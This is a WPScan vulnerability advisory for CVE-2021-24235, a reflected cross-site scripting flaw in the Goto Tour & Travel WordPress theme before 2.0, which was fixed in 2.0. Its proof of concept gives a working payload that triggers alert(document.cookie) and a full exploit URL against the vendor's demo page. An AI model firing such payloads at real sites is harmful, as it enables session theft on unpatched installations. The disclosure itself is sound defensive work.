WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Goto - Tour & Travel < 2.0 - Unauthenticated Reflected XSS

Description

The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//>

https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13

Affects Themes

goto
Fixed in version 2.0

References

CVE
CVE-2021-24235
URL
https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

Yes

WPVDB ID
eece90aa-582b-4c49-8b7c-14027f9df139

Timeline

Publicly Published

2021-03-31 (about 2 years ago)

Added

2021-03-31 (about 2 years ago)

Last Updated

2021-04-01 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin